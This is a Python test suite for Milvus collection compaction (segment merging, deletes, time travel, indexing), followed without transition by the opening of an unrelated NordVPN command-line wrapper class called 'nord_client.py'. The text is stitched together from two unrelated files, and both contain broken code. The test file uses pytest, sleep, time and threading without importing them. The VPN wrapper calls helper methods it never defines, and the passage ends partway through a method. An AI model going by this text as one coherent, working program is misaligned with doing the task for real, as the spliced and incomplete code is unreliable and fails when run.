from pymilvus.grpc_gen.common_pb2 import SegmentState
from base.client_base import TestcaseBase
from common import common_func as cf
from common import common_type as ct
from common.common_type import CaseLabel, CheckTasks
from utils.util_log import test_log as log
prefix = "compact"
tmp_nb = 100
class TestCompactionParams(TestcaseBase):
@pytest.mark.tags(CaseLabel.L2)
def test_compact_without_connection(self):
"""
target: test compact without connection
method: compact after remove connection
expected: raise exception
"""
# init collection with tmp_nb default data
collection_w = self.init_collection_general(prefix, nb=tmp_nb, insert_data=True)[0]
# remove connection and delete
self.connection_wrap.remove_connection(ct.default_alias)
res_list, _ = self.connection_wrap.list_connections()
assert ct.default_alias not in res_list
error = {ct.err_code: 0, ct.err_msg: "should create connect first"}
collection_w.compact(check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_compact_twice(self):
"""
target: test compact twice
method: 1.create with shard_num=1
2.insert and flush twice (two segments)
3.compact
4.insert new data
5.compact
expected: Merge into one segment
"""
# init collection with one shard, insert into two segments
collection_w = self.collection_insert_multi_segments_one_shard(prefix, nb_of_segment=tmp_nb)
# first compact two segments
collection_w.compact()
collection_w.wait_for_compaction_completed()
c_plans1 = collection_w.get_compaction_plans()[0]
target_1 = c_plans1.plans[0].target
# insert new data
df = cf.gen_default_dataframe_data(tmp_nb)
collection_w.insert(df)
log.debug(collection_w.num_entities)
# second compact
collection_w.compact()
collection_w.wait_for_compaction_completed()
collection_w.get_compaction_state()
c_plans2 = collection_w.get_compaction_plans()[0]
assert target_1 in c_plans2.plans[0].sources
log.debug(c_plans2.plans[0].target)
@pytest.mark.tags(CaseLabel.L1)
def test_compact_partition(self):
"""
target: test compact partition
method: compact partition
expected: Verify partition segments merged
"""
# create collection with shard_num=1, and create partition
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix), shards_num=1)
partition_w = self.init_partition_wrap(collection_wrap=collection_w)
# insert flush twice
for i in range(2):
df = cf.gen_default_dataframe_data(tmp_nb)
partition_w.insert(df)
assert partition_w.num_entities == tmp_nb * (i + 1)
# compact
collection_w.compact()
collection_w.wait_for_compaction_completed()
c_plans = collection_w.get_compaction_plans()[0]
assert len(c_plans.plans) == 1
assert len(c_plans.plans[0].sources) == 2
target = c_plans.plans[0].target
# verify queryNode load the compacted segments
collection_w.load()
segment_info = self.utility_wrap.get_query_segment_info(collection_w.name)[0]
assert target == segment_info[0].segmentID
@pytest.mark.tags(CaseLabel.L2)
def test_compact_only_growing_segment(self):
"""
target: test compact growing data
method: 1.insert into multi segments without flush
2.compact
expected: No compaction (compact just for sealed data)
"""
# create and insert without flush
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix))
df = cf.gen_default_dataframe_data(tmp_nb)
collection_w.insert(df)
# compact when only growing segment
collection_w.compact()
collection_w.wait_for_compaction_completed()
c_plans = collection_w.get_compaction_plans()[0]
assert len(c_plans.plans) == 0
collection_w.load()
segments_info = self.utility_wrap.get_query_segment_info(collection_w.name)[0]
for segment_info in segments_info:
assert segment_info.state == SegmentState.Growing
@pytest.mark.tags(CaseLabel.L2)
def test_compact_empty_collection(self):
"""
target: test compact an empty collection
method: compact an empty collection
expected: No exception
"""
# init collection and empty
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix))
# compact
collection_w.compact()
c_plans, _ = collection_w.get_compaction_plans()
assert len(c_plans.plans) == 0
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.parametrize("delete_pos", [1, tmp_nb // 2])
def test_compact_after_delete(self, delete_pos):
"""
target: test delete one entity and compact
method: 1.create with shard_num=1
2.delete one sealed entity or half of the entities (per delete_pos)
3.compact
expected: Verify compact result
"""
# create, insert without flush
collection_w = self.init_collection_wrap(cf.gen_unique_str(prefix))
df = cf.gen_default_dataframe_data(tmp_nb)
insert_res, _ = collection_w.insert(df)
# delete entities (one or half, per delete_pos) and flush
single_expr = f'{ct.default_int64_field_name} in {insert_res.primary_keys[:delete_pos]}'
collection_w.delete(single_expr)
assert collection_w.num_entities == tmp_nb
# compact, get plan
collection_w.compact()
collection_w.wait_for_compaction_completed()
c_plans = collection_w.get_compaction_plans()[0]
# Delete type compaction just merge insert log and delta log of one segment
# todo assert len(c_plans.plans[0].sources) == 1
collection_w.load()
collection_w.query(single_expr, check_task=CheckTasks.check_query_empty)
res = df.iloc[-1:, :1].to_dict('records')
collection_w.query(f'{ct.default_int64_field_name} in {insert_res.primary_keys[-1:]}',
check_task=CheckTasks.check_query_results, check_items={'exp_res': res})
@pytest.mark.xfail("Issue #15499")
@pytest.mark.tags(CaseLabel.L3)
def test_compact_after_delete_index(self):
"""
target: test compact after delete and create index
method: 1.create with 1 shard and insert nb entities (ensure can be index)
2.delete some entities and flush (ensure generate delta log)
3.create index
4.compact outside retentionDuration
5.load and search with travel time
expected: Empty search result
"""
# create, insert without flush
collection_w = self.init_collection_wrap(cf.gen_unique_str(prefix), shards_num=1)
df = cf.gen_default_dataframe_data()
insert_res, _ = collection_w.insert(df)
# delete and flush
expr = f'{ct.default_int64_field_name} in {insert_res.primary_keys[:ct.default_nb // 2]}'
collection_w.delete(expr)
assert collection_w.num_entities == ct.default_nb
# build index
collection_w.create_index(ct.default_float_vec_field_name, ct.default_index)
log.debug(collection_w.index())
# compact, get plan
sleep(50)
collection_w.compact()
collection_w.wait_for_compaction_completed()
c_plans = collection_w.get_compaction_plans()[0]
assert len(c_plans.plans[0].sources) == 1
collection_w.load()
res, _ = collection_w.search(df[ct.default_float_vec_field_name][:1].to_list(),
ct.default_float_vec_field_name,
ct.default_search_params, ct.default_limit)
# Time travel currently does not support traveling back beyond the retention duration, so just verify search is available.
assert len(res[0]) == ct.default_limit
@pytest.mark.tags(CaseLabel.L1)
def test_compact_delete_ratio(self):
"""
target: test delete entities reaches ratio and auto-compact
method: 1.create with shard_num=1
2.insert (compaction loads the delta log from storage, not from the dmlChannel)
3.delete 20% of nb, flush
expected: Verify auto compaction, merge insert log and delta log
"""
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix), shards_num=1)
df = cf.gen_default_dataframe_data(tmp_nb)
insert_res, _ = collection_w.insert(df)
# delete 20% entities
ratio_expr = f'{ct.default_int64_field_name} in {insert_res.primary_keys[:tmp_nb // ct.compact_delta_ratio_reciprocal]}'
collection_w.delete(ratio_expr)
assert collection_w.num_entities == tmp_nb
# auto_compact
sleep(1)
# Delete type compaction just merge insert log and delta log of one segment
# todo assert len(c_plans.plans[0].sources) == 1
collection_w.load()
collection_w.query(ratio_expr, check_task=CheckTasks.check_query_empty)
res = df.iloc[-1:, :1].to_dict('records')
collection_w.query(f'{ct.default_int64_field_name} in {insert_res.primary_keys[-1:]}',
check_task=CheckTasks.check_query_results, check_items={'exp_res': res})
@pytest.mark.tags(CaseLabel.L2)
def test_compact_delete_less_ratio(self):
"""
target: test delete entities less ratio and no compact
method: 1.create collection shard_num=1
2.insert without flush
3.delete 10% entities and flush
expected: Verify no compact (can't), delete successfully
"""
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix), shards_num=1)
df = cf.gen_default_dataframe_data(tmp_nb)
insert_res, _ = collection_w.insert(df)
# delete 10% entities, ratio = 0.1
less_ratio_reciprocal = 10
ratio_expr = f'{ct.default_int64_field_name} in {insert_res.primary_keys[:tmp_nb // less_ratio_reciprocal]}'
collection_w.delete(ratio_expr)
assert collection_w.num_entities == tmp_nb
collection_w.load()
collection_w.query(ratio_expr, check_task=CheckTasks.check_query_empty)
@pytest.mark.tags(CaseLabel.L0)
def test_compact_after_delete_all(self):
"""
target: test delete all and compact
method: 1.create with shard_num=1
2.delete all sealed data
3.compact
expected: collection num_entities is close to 0
"""
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix), shards_num=1)
df = cf.gen_default_dataframe_data()
res, _ = collection_w.insert(df)
expr = f'{ct.default_int64_field_name} in {res.primary_keys}'
collection_w.delete(expr)
assert collection_w.num_entities == ct.default_nb
# currently no way to verify whether it is compacted after delete,
# because the merge compaction plan is generated first
collection_w.compact()
collection_w.wait_for_compaction_completed()
collection_w.get_compaction_plans()
log.debug(collection_w.num_entities)
collection_w.load()
collection_w.query(expr, check_task=CheckTasks.check_query_empty)
@pytest.mark.skip(reason="TODO")
@pytest.mark.tags(CaseLabel.L2)
def test_compact_delete_max_delete_size(self):
"""
target: test compact delta log reaches max delete size 10MiB
method: todo
expected: auto merge single segment
"""
pass
@pytest.mark.tags(CaseLabel.L2)
def test_compact_max_time_interval(self):
"""
target: test auto compact with max interval 60s
method: 1.create with shard_num=1
2.insert flush twice (two segments)
3.wait max_compaction_interval (60s)
expected: Verify compaction results
"""
# create collection with shard_num=1, then insert compact_segment_num_threshold segments, each with tmp_nb entities
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix), shards_num=1)
collection_w.compact()
# Notice: The merge-segments compaction triggered by max_compaction_interval also needs to meet
# the compact_segment_num_threshold
for i in range(ct.compact_segment_num_threshold):
df = cf.gen_default_dataframe_data(tmp_nb)
collection_w.insert(df)
assert collection_w.num_entities == tmp_nb * (i + 1)
sleep(ct.max_compaction_interval + 1)
# verify queryNode load the compacted segments
collection_w.load()
segment_info = self.utility_wrap.get_query_segment_info(collection_w.name)[0]
assert len(segment_info) == 1
@pytest.mark.skip(reason="TODO")
@pytest.mark.tags(CaseLabel.L2)
def test_compact_delta_max_time_interval(self):
"""
target: test merge insert and delta log triggered by max_compaction_interval
method: todo
expected: auto merge
"""
pass
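# Illustrative sketch (not part of the test suite): the manual compaction flow these cases
# exercise, written against the raw pymilvus Collection API rather than the test wrappers.
# Kept as comments so pytest collection is unaffected; "compact_demo" and the connection
# parameters are hypothetical and assume a running Milvus server.
#   from pymilvus import connections, Collection
#   connections.connect(host="localhost", port="19530")
#   coll = Collection("compact_demo")
#   coll.compact()                          # trigger manual compaction
#   coll.wait_for_compaction_completed()    # block until the plan finishes
#   print(coll.get_compaction_plans())      # inspect merged segment sources/target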
class TestCompactionOperation(TestcaseBase):
@pytest.mark.tags(CaseLabel.L2)
def test_compact_both_delete_merge(self):
"""
target: test compact both delete and merge
method: 1.create collection with shard_num=1
2.insert data into two segments
3.delete and flush (new insert)
4.compact
5.load and search
expected: Verify search result excludes the deleted ids
"""
collection_w = self.init_collection_wrap(cf.gen_unique_str(prefix), shards_num=1)
ids = []
for i in range(2):
df = cf.gen_default_dataframe_data(tmp_nb, start=i * tmp_nb)
insert_res, _ = collection_w.insert(df)
assert collection_w.num_entities == (i + 1) * tmp_nb
ids.extend(insert_res.primary_keys)
expr = f'{ct.default_int64_field_name} in {[0, 2 * tmp_nb - 1]}'
collection_w.delete(expr)
collection_w.insert(cf.gen_default_dataframe_data(1, start=2 * tmp_nb))
assert collection_w.num_entities == 2 * tmp_nb + 1
collection_w.compact()
collection_w.wait_for_compaction_completed()
collection_w.get_compaction_plans()
# search
sleep(5)
ids.pop(0)
ids.pop(-1)
collection_w.load()
search_res, _ = collection_w.search(cf.gen_vectors(ct.default_nq, ct.default_dim),
ct.default_float_vec_field_name,
ct.default_search_params, ct.default_limit,
check_task=CheckTasks.check_search_results,
check_items={"nq": ct.default_nq,
"ids": ids,
"limit": ct.default_limit})
@pytest.mark.tags(CaseLabel.L1)
def test_compact_after_index(self):
"""
target: test compact after create index
method: 1.insert data into two segments
2.create index
3.compact
4.search
expected: Verify segment info and index info
"""
collection_w = self.collection_insert_multi_segments_one_shard(prefix, nb_of_segment=ct.default_nb,
is_dup=False)
# create index
collection_w.create_index(ct.default_float_vec_field_name, ct.default_index)
log.debug(collection_w.index())
# compact
collection_w.compact()
collection_w.wait_for_compaction_completed()
collection_w.get_compaction_plans()
# search
collection_w.load()
search_res, _ = collection_w.search(cf.gen_vectors(ct.default_nq, ct.default_dim),
ct.default_float_vec_field_name,
ct.default_search_params, ct.default_limit)
assert len(search_res) == ct.default_nq
for hits in search_res:
assert len(hits) == ct.default_limit
@pytest.mark.tags(CaseLabel.L1)
def test_compact_after_binary_index(self):
"""
target: test compact after create index
method: 1.insert binary data into two segments
2.create binary index
3.compact
4.search
expected: Verify segment info and index info
"""
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix), shards_num=1,
schema=cf.gen_default_binary_collection_schema())
for i in range(2):
df, _ = cf.gen_default_binary_dataframe_data(ct.default_nb)
collection_w.insert(data=df)
assert collection_w.num_entities == (i + 1) * ct.default_nb
# create index
collection_w.create_index(ct.default_binary_vec_field_name, ct.default_binary_index)
log.debug(collection_w.index())
collection_w.load()
search_params = {"metric_type": "JACCARD", "params": {"nprobe": 10}}
vectors = cf.gen_binary_vectors(ct.default_nq, ct.default_dim)[1]
search_res_one, _ = collection_w.search(vectors,
ct.default_binary_vec_field_name,
search_params, ct.default_limit)
assert len(search_res_one) == ct.default_nq
for hits in search_res_one:
assert len(hits) == ct.default_limit
# compact
collection_w.compact()
collection_w.wait_for_compaction_completed()
collection_w.get_compaction_plans()
# verify index re-build and re-load
search_params = {"metric_type": "L1", "params": {"nprobe": 10}}
search_res_two, _ = collection_w.search(vectors,
ct.default_binary_vec_field_name,
search_params, ct.default_limit,
check_task=CheckTasks.err_res,
check_items={ct.err_code: 1,
ct.err_msg: "Metric type of field index isn't "
"the same with search info"})
# verify search result
search_params = {"metric_type": "JACCARD", "params": {"nprobe": 10}}
search_res_two, _ = collection_w.search(vectors,
ct.default_binary_vec_field_name,
search_params, ct.default_limit)
assert len(search_res_two) == ct.default_nq
for hits in search_res_two:
assert len(hits) == ct.default_limit
@pytest.mark.tags(CaseLabel.L1)
def test_compact_and_index(self):
"""
target: test compact and create index
method: 1.insert data into two segments
2.compact
3.create index
4.load and search
expected: Verify search result and index info
"""
collection_w = self.collection_insert_multi_segments_one_shard(prefix, nb_of_segment=ct.default_nb,
is_dup=False)
# compact
collection_w.compact()
collection_w.wait_for_compaction_completed()
collection_w.get_compaction_plans()
# create index
collection_w.create_index(ct.default_float_vec_field_name, ct.default_index)
log.debug(collection_w.index())
# search
collection_w.load()
search_res, _ = collection_w.search(cf.gen_vectors(ct.default_nq, ct.default_dim),
ct.default_float_vec_field_name,
ct.default_search_params, ct.default_limit)
assert len(search_res) == ct.default_nq
for hits in search_res:
assert len(hits) == ct.default_limit
@pytest.mark.tags(CaseLabel.L1)
def test_compact_delete_and_search(self):
"""
target: test delete and compact segment, and search
method: 1.create collection and insert
2.delete part entities
3.compact
4.load and search
expected: Verify search result
"""
collection_w = self.init_collection_wrap(cf.gen_unique_str(prefix), shards_num=1)
df = cf.gen_default_dataframe_data()
insert_res, _ = collection_w.insert(df)
expr = f'{ct.default_int64_field_name} in {insert_res.primary_keys[:ct.default_nb // 2]}'
collection_w.delete(expr)
assert collection_w.num_entities == ct.default_nb
collection_w.compact()
# search
sleep(2)
collection_w.load()
search_res, _ = collection_w.search(cf.gen_vectors(ct.default_nq, ct.default_dim),
ct.default_float_vec_field_name,
ct.default_search_params, ct.default_limit,
check_task=CheckTasks.check_search_results,
check_items={"nq": ct.default_nq,
"ids": insert_res.primary_keys[ct.default_nb // 2:],
"limit": ct.default_limit}
)
@pytest.mark.tags(CaseLabel.L0)
def test_compact_merge_and_search(self):
"""
target: test compact and search
method: 1.insert data into two segments
2.compact
3.load and search
expected: Verify search result
"""
collection_w = self.collection_insert_multi_segments_one_shard(prefix, nb_of_segment=ct.default_nb,
is_dup=False)
# compact
collection_w.compact()
collection_w.wait_for_compaction_completed()
collection_w.get_compaction_plans()
# search
collection_w.load()
search_res, _ = collection_w.search(cf.gen_vectors(ct.default_nq, ct.default_dim),
ct.default_float_vec_field_name,
ct.default_search_params, ct.default_limit)
assert len(search_res) == ct.default_nq
for hits in search_res:
assert len(hits) == ct.default_limit
@pytest.mark.tags(CaseLabel.L2)
def test_compact_search_after_delete_channel(self):
"""
target: test search after compact, where queryNode gets the delete request from the channel
rather than from the compacted delta log
method: 1.insert, flush and load
2.delete half
3.compact
4.search
expected: No compact, compact get delta log from storage
"""
collection_w = self.init_collection_wrap(cf.gen_unique_str(prefix), shards_num=1)
df = cf.gen_default_dataframe_data()
insert_res, _ = collection_w.insert(df)
assert collection_w.num_entities == ct.default_nb
collection_w.load()
expr = f'{ct.default_int64_field_name} in {insert_res.primary_keys[:ct.default_nb // 2]}'
collection_w.delete(expr)
collection_w.compact()
c_plans = collection_w.get_compaction_plans()[0]
assert len(c_plans.plans) == 0
# search
sleep(2)
collection_w.load()
search_res, _ = collection_w.search(cf.gen_vectors(ct.default_nq, ct.default_dim),
ct.default_float_vec_field_name,
ct.default_search_params, ct.default_limit,
check_task=CheckTasks.check_search_results,
check_items={"nq": ct.default_nq,
"ids": insert_res.primary_keys[ct.default_nb // 2:],
"limit": ct.default_limit}
)
@pytest.mark.tags(CaseLabel.L1)
def test_compact_delete_inside_time_travel(self):
"""
target: test compact inside time_travel range
method: 1.insert data and get ts
2.delete all ids
4.compact
5.search with ts
expected: Verify search result
"""
from pymilvus import utility
collection_w = self.init_collection_wrap(cf.gen_unique_str(prefix), shards_num=1)
# insert and get tt
df = cf.gen_default_dataframe_data(tmp_nb)
insert_res, _ = collection_w.insert(df)
tt = utility.mkts_from_hybridts(insert_res.timestamp, milliseconds=0.)
# delete all
expr = f'{ct.default_int64_field_name} in {insert_res.primary_keys}'
delete_res, _ = collection_w.delete(expr)
log.debug(collection_w.num_entities)
collection_w.compact()
collection_w.load()
search_one, _ = collection_w.search(df[ct.default_float_vec_field_name][:1].to_list(),
ct.default_float_vec_field_name,
ct.default_search_params, ct.default_limit,
travel_timestamp=tt)
assert 0 in search_one[0].ids
@pytest.mark.tags(CaseLabel.L3)
def test_compact_delete_outside_time_travel(self):
"""
target: test compact outside time_travel range
method: 1.create and insert
2.get time stamp
3.delete
4.compact after compact_retention_duration
5.load and search with travel time tt
expected: Empty search result
But there is currently no way to verify this, because time travel does not support traveling back beyond the retention duration
"""
from pymilvus import utility
collection_w = self.init_collection_wrap(cf.gen_unique_str(prefix), shards_num=1)
# insert
df = cf.gen_default_dataframe_data(tmp_nb)
insert_res, _ = collection_w.insert(df)
tt = utility.mkts_from_hybridts(insert_res.timestamp, milliseconds=0.)
expr = f'{ct.default_int64_field_name} in {insert_res.primary_keys}'
delete_res, _ = collection_w.delete(expr)
log.debug(collection_w.num_entities)
# ensure compact remove delta data that delete outside retention range
# sleep(ct.compact_retention_duration)
sleep(60)
collection_w.compact()
collection_w.wait_for_compaction_completed()
collection_w.load()
# search with travel_time tt
search_res, _ = collection_w.search(df[ct.default_float_vec_field_name][:1].to_list(),
ct.default_float_vec_field_name,
ct.default_search_params, ct.default_limit,
travel_timestamp=tt)
log.debug(search_res[0].ids)
assert len(search_res[0]) == 0
@pytest.mark.tags(CaseLabel.L0)
def test_compact_merge_two_segments(self):
"""
target: test compact merge two segments
method: 1.create with shard_num=1
2.insert and flush
3.insert and flush again
4.compact
5.load
expected: Verify segments are merged
"""
num_of_segment = 2
# create collection shard_num=1, insert 2 segments, each with tmp_nb entities
collection_w = self.collection_insert_multi_segments_one_shard(prefix, num_of_segment, tmp_nb)
collection_w.compact()
collection_w.wait_for_compaction_completed()
c_plans = collection_w.get_compaction_plans()[0]
# verify the two segments are merged into one
assert len(c_plans.plans) == 1
assert len(c_plans.plans[0].sources) == 2
target = c_plans.plans[0].target
# verify queryNode load the compacted segments
collection_w.load()
segment_info = self.utility_wrap.get_query_segment_info(collection_w.name)[0]
assert target == segment_info[0].segmentID
@pytest.mark.tags(CaseLabel.L2)
def test_compact_no_merge(self):
"""
target: test compact when no segments merge
method: 1.create with shard_num=1
2.insert and flush
3.compact and search
expected: No exception and no compact plans
"""
# create collection
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix), shards_num=1)
df = cf.gen_default_dataframe_data(tmp_nb)
collection_w.insert(df)
assert collection_w.num_entities == tmp_nb
collection_w.compact()
collection_w.wait_for_compaction_completed()
c_plans, _ = collection_w.get_compaction_plans()
assert len(c_plans.plans) == 0
@pytest.mark.tags(CaseLabel.L1)
def test_compact_manual_and_auto(self):
"""
target: test compact manual and auto
method: 1.create with shard_num=1
2.insert one and flush (11 times)
3.compact
4.load and search
expected: Verify segments info
"""
# greater than auto-merge threshold 10
num_of_segment = ct.compact_segment_num_threshold + 1
# create collection shard_num=1, insert 11 segments, each with one entity
collection_w = self.collection_insert_multi_segments_one_shard(prefix, num_of_segment=num_of_segment)
collection_w.compact()
collection_w.wait_for_compaction_completed()
collection_w.get_compaction_plans()[0]
collection_w.load()
segments_info = self.utility_wrap.get_query_segment_info(collection_w.name)[0]
assert len(segments_info) == 1
@pytest.mark.tags(CaseLabel.L1)
def test_compact_merge_multi_segments(self):
"""
target: test compact and merge multi small segments
method: 1.create with shard_num=1
2.insert one and flush (less than threshold)
3.compact
4.load and search
expected: Verify segments info
"""
# less than auto-merge threshold 10
num_of_segment = ct.compact_segment_num_threshold - 1
# create collection with shard_num=1, insert (threshold - 1) segments, each with one entity
collection_w = self.collection_insert_multi_segments_one_shard(prefix, num_of_segment=num_of_segment)
collection_w.compact()
collection_w.wait_for_compaction_completed()
c_plans = collection_w.get_compaction_plans()[0]
assert len(c_plans.plans[0].sources) == num_of_segment
target = c_plans.plans[0].target
collection_w.load()
segments_info = self.utility_wrap.get_query_segment_info(collection_w.name)[0]
assert len(segments_info) == 1
assert segments_info[0].segmentID == target
@pytest.mark.tags(CaseLabel.L2)
def test_compact_merge_inside_time_travel(self):
"""
target: test compact and merge segments inside time_travel range
method: search with time travel after merge compact
expected: Verify segments inside time_travel merged
"""
from pymilvus import utility
# create collection shard_num=1, insert 2 segments, each with tmp_nb entities
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix), shards_num=1)
# insert twice
df1 = cf.gen_default_dataframe_data(tmp_nb)
collection_w.insert(df1)[0]
assert collection_w.num_entities == tmp_nb
df2 = cf.gen_default_dataframe_data(tmp_nb, start=tmp_nb)
insert_two = collection_w.insert(df2)[0]
assert collection_w.num_entities == tmp_nb * 2
tt = utility.mkts_from_hybridts(insert_two.timestamp, milliseconds=0.1)
collection_w.compact()
collection_w.wait_for_compaction_completed()
collection_w.get_compaction_plans()[0]
collection_w.load()
search_res, _ = collection_w.search(df2[ct.default_float_vec_field_name][:1].to_list(),
ct.default_float_vec_field_name,
ct.default_search_params, ct.default_limit,
travel_timestamp=tt)
assert tmp_nb in search_res[0].ids
assert len(search_res[0]) == ct.default_limit
@pytest.mark.tags(CaseLabel.L2)
def test_compact_threshold_auto_merge(self):
"""
target: test that when the number of segments (each smaller than 1/2 of the max segment size) reaches the auto-merge threshold 10, they are compacted
method: 1.create with shard_num=1
2.insert flush 10 times (merge threshold 10)
3.wait for compaction, load
expected: Get query segments info to verify segments auto-merged into one
"""
threshold = ct.compact_segment_num_threshold
# create collection shard_num=1, insert 10 segments, each with one entity
collection_w = self.collection_insert_multi_segments_one_shard(prefix, num_of_segment=threshold)
# Estimated auto-merging takes 30s
cost = 60
collection_w.load()
start = time()
while True:
sleep(5)
segments_info = self.utility_wrap.get_query_segment_info(collection_w.name)[0]
# verify segments reaches threshold, auto-merge ten segments into one
if len(segments_info) == 1:
break
end = time()
if end - start > cost:
raise Exception("Compaction auto-merge took more than 60s")
@pytest.mark.tags(CaseLabel.L2)
def test_compact_less_threshold_no_merge(self):
"""
target: test that segments smaller than 1/2 of the max segment size are not compacted when their number does not reach the threshold
method: 1.create collection with shard_num = 1
2.insert flush 9 times (segments threshold 10)
3.after a while, load
expected: Verify segments are not merged
"""
less_threshold = ct.compact_segment_num_threshold - 1
# create collection shard_num=1, insert 9 segments, each with one entity
collection_w = self.collection_insert_multi_segments_one_shard(prefix, num_of_segment=less_threshold)
sleep(3)
# load and verify no auto-merge
collection_w.load()
segments_info = self.utility_wrap.get_query_segment_info(collection_w.name)[0]
assert len(segments_info) == less_threshold
@pytest.mark.skip(reason="Todo")
@pytest.mark.tags(CaseLabel.L2)
def test_compact_multi_collections(self):
"""
target: test compact multi collections with merge
method: create 50 collections, add entities into them and compact in turn
expected: No exception
"""
pass
@pytest.mark.tags(CaseLabel.L1)
def test_compact_and_insert(self):
"""
target: test insert after compact
method: 1.create and insert with flush
2.compact the two segments
3.insert new data
4.load and search
expected: Verify search result and segment info
"""
# create collection shard_num=1, insert 2 segments, each with tmp_nb entities
collection_w = self.collection_insert_multi_segments_one_shard(prefix, nb_of_segment=tmp_nb)
# compact two segments
collection_w.compact()
collection_w.wait_for_compaction_completed()
collection_w.get_compaction_plans()
# insert new data, verify insert flush successfully
df = cf.gen_default_dataframe_data(tmp_nb)
collection_w.insert(df)
assert collection_w.num_entities == tmp_nb * 3
@pytest.mark.tags(CaseLabel.L1)
def test_compact_and_delete(self):
"""
target: test delete after compact
method: 1.delete half and compact
2.load and query
3.delete and query
expected: Verify deleted ids
"""
# init collection with one shard, insert into two segments
collection_w = self.collection_insert_multi_segments_one_shard(prefix, is_dup=False)
# compact and complete
collection_w.compact()
collection_w.wait_for_compaction_completed()
collection_w.get_compaction_plans()
# delete and query
expr = f'{ct.default_int64_field_name} in {[0]}'
collection_w.delete(expr)
collection_w.load()
collection_w.query(expr, check_task=CheckTasks.check_query_empty)
expr_1 = f'{ct.default_int64_field_name} in {[1]}'
collection_w.query(expr_1, check_task=CheckTasks.check_query_results, check_items={'exp_res': [{'int64': 1}]})
@pytest.mark.tags(CaseLabel.L1)
def test_compact_cross_shards(self):
"""
target: test compact cross shards
method: 1.create with shard_num=2
2.insert once and flush (two segments, belonging to two shards)
3.compact and completed
expected: Verify no compact
"""
# insert into two segments with two shard
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix), shards_num=2)
df = cf.gen_default_dataframe_data(tmp_nb)
collection_w.insert(df)
assert collection_w.num_entities == tmp_nb
# compact
collection_w.compact()
collection_w.wait_for_compaction_completed(timeout=1)
c_plans = collection_w.get_compaction_plans()[0]
        # verify that no segments were actually merged
assert len(c_plans.plans) == 0
@pytest.mark.tags(CaseLabel.L1)
def test_compact_cross_partition(self):
"""
target: test compact cross partitions
method: 1.create with shard_num=1
2.create partition and insert, flush
3.insert _default partition and flush
4.compact
expected: Verify no compact
"""
# create collection and partition
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix), shards_num=1)
partition_w = self.init_partition_wrap(collection_wrap=collection_w)
# insert
df = cf.gen_default_dataframe_data(tmp_nb)
collection_w.insert(df)
assert collection_w.num_entities == tmp_nb
partition_w.insert(df)
assert collection_w.num_entities == tmp_nb * 2
# compact
collection_w.compact()
collection_w.wait_for_compaction_completed()
c_plans = collection_w.get_compaction_plans()[0]
        # verify that no segments were actually merged
assert len(c_plans.plans) == 0
collection_w.load()
segments_info = self.utility_wrap.get_query_segment_info(collection_w.name)[0]
assert segments_info[0].partitionID != segments_info[-1].partitionID
@pytest.mark.tags(CaseLabel.L2)
def test_compact_during_insert(self):
"""
target: test compact during insert and flush
method: 1.insert entities into multi segments
2.start a thread to load and search
3.compact collection
expected: Search and compact both successfully
"""
collection_w = self.collection_insert_multi_segments_one_shard(prefix, nb_of_segment=ct.default_nb,
is_dup=False)
df = cf.gen_default_dataframe_data()
def do_flush():
collection_w.insert(df)
log.debug(collection_w.num_entities)
# compact during insert
t = threading.Thread(target=do_flush, args=())
t.start()
collection_w.compact()
collection_w.wait_for_compaction_completed()
collection_w.get_compaction_plans()
t.join()
collection_w.load()
seg_info = self.utility_wrap.get_query_segment_info(collection_w.name)[0]
assert len(seg_info) == 2
@pytest.mark.tags(CaseLabel.L2)
def test_compact_during_index(self):
"""
target: test compact during index
        method: while compacting the collection, start a thread to create an index
expected: No exception
"""
collection_w = self.collection_insert_multi_segments_one_shard(prefix, nb_of_segment=ct.default_nb,
is_dup=False)
def do_index():
collection_w.create_index(ct.default_float_vec_field_name, ct.default_index)
assert collection_w.index()[0].params == ct.default_index
# compact during index
t = threading.Thread(target=do_index, args=())
t.start()
collection_w.compact()
collection_w.wait_for_compaction_completed()
collection_w.get_compaction_plans()
t.join()
collection_w.load()
seg_info = self.utility_wrap.get_query_segment_info(collection_w.name)[0]
assert len(seg_info) == 1
|
nord_client.py
|
from subprocess import Popen, PIPE
from threading import Thread
import webbrowser
import re
class NordClient(object):
def __init__(self, error_cb=None):
if error_cb:
self.error_cb = error_cb
else:
self.error_cb = self._base_error
self.account_information = ""
self.email = ""
self.vpn_service = ""
self.status_dict = {}
self.version = ""
self.country_dict = {}
self.group_list = []
self.settings_dict = {}
self.logged_in = False
self.cancel_login = False
self._base_cmd = "nordvpn"
self._account = "account"
self._add = "add"
self._all = "all"
self._cities = "cities"
self._connect = "connect"
self._countries = "countries"
self._disable = "disable"
self._disconnect = "disconnect"
self._dns = "dns"
self._enable = "enable"
self._groups = "groups"
self._login = "login"
self._logout = "logout"
self._rate = "rate"
self._register = "register"
self._remove = "remove"
self._port = "port"
self._protocol = "protocol"
self._set = "set"
self._settings = "settings"
self._status = "status"
self._subnet = "subnet"
self._technology = "technology"
self._whitelist = "whitelist"
self._help = "help"
self._version = "version"
self.get_countries()
self.get_groups()
self.get_settings()
self.get_account_info()
self.get_status()
self.get_version()
def add_whitelist_subnet(self, subnet, success_cb=None, error_cb=None):
cmd = f"{self._base_cmd} {self._whitelist} {self._add} {self._subnet} {subnet}"
thread = self._setup_thread(cmd, success_cb, error_cb)
if thread:
return thread.start()
        self._send_command(cmd, self._base_success_cb, self._base_error_cb)
def add_whitelist_port(self, port, success_cb=None, error_cb=None):
cmd = f"{self._base_cmd} {self._whitelist} {self._add} {self._port} {port}"
thread = self._setup_thread(cmd, success_cb, error_cb)
if thread:
return thread.start()
        self._send_command(cmd, self._base_success_cb, self._base_error_cb)
def get_groups(self, success_cb=None, error_cb=None):
cmd = f"{self._base_cmd} {self._groups}"
thread = self._setup_thread(cmd, success_cb, error_cb)
if thread:
return thread.start()
